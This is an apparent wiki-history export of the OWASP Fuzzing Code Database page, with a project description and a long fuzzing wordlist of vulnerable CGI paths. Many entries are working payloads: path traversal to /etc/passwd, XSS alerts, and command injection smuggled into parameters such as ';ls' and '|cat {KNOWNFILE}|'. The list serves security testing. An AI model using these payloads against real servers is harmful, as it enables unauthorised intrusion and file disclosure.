| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80074</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80074"/>
				<updated>2010-03-17T21:07:48Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Vulnerable Cross-Platform CGI (7 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (7 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
